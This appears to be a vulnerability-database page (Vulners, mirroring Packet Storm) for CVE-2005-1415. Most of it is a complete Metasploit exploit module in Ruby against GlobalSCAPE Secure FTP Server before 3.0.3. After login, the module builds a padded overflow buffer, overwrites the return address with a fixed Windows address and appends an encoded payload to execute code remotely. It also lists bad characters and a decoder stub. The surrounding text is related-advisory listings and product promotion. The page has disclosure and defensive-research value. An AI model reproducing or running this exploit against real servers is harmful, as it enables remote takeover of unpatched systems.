Lucene search
K

GlobalSCAPE Secure FTP Server Input Overflow

🗓️ 26 Nov 2009 00:00:00Reported by Mati AharoniType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

GlobalSCAPE Secure FTP Server Input Overflow, Buffer Overflow vulnerability in versions prior to 3.0.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2005-1415
5 Oct 201000:00
circl
CVE
CVE-2005-1415
3 May 200504:00
cve
Cvelist
CVE-2005-1415
3 May 200504:00
cvelist
Exploit DB
GlobalScape Secure FTP Server - Input Overflow (Metasploit)
5 Oct 201000:00
exploitdb
Tenable Nessus
Multiple FTP Server Command Handling Overflow
22 Jun 199900:00
nessus
Tenable Nessus
GlobalSCAPE Secure FTP Server User Input Overflow
6 Jul 200500:00
nessus
Metasploit
GlobalSCAPE Secure FTP Server Input Overflow
25 Nov 200504:11
metasploit
NVD
CVE-2005-1415
3 May 200504:00
nvd
OpenVAS
GlobalSCAPE Secure FTP Server <= 3.0.2 User Input Overflow Vulnerability
3 Nov 200500:00
openvas
OpenVAS
GlobalSCAPE Secure FTP Server User Input Overflow
3 Nov 200500:00
openvas
Rows per page
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Ftp  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'GlobalSCAPE Secure FTP Server Input Overflow',  
'Description' => %q{  
This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.   
All versions prior to 3.0.3 are affected by this flaw. A valid user account (  
or anonymous access) is required for this exploit to work.   
},  
'Author' => [ 'Fairuzan Roslan <riaf [at] mysec.org>', 'Mati Aharoni <mati [at] see-security.com>' ],  
'License' => BSD_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2005-1415'],  
[ 'OSVDB', '16049'],  
[ 'BID', '13454'],  
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html'],  
],  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 1000,  
'BadChars' => "\x00\x20\x61\x62\x63\x64\x65\x66\x67\x68\x69" +  
"\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74" +  
"\x75\x76\x77\x78\x79\x7a",  
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",  
  
},  
'Targets' =>   
[  
[  
'GlobalSCAPE Secure FTP Server <= 3.0.2 Universal',  
{  
'Platform' => 'win',  
'Ret' => 0x1002f01f,  
},  
],  
],  
'DisclosureDate' => 'May 1 2005',  
'DefaultTarget' => 0))  
end  
  
def exploit  
connect_login  
  
buf = make_nops(3047)  
buf[2043, 4] = [ target.ret ].pack('V')  
buf[2047, payload.encoded.length] = payload.encoded  
  
send_cmd( [buf] )  
  
handler  
disconnect  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Nov 2009 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.67935
30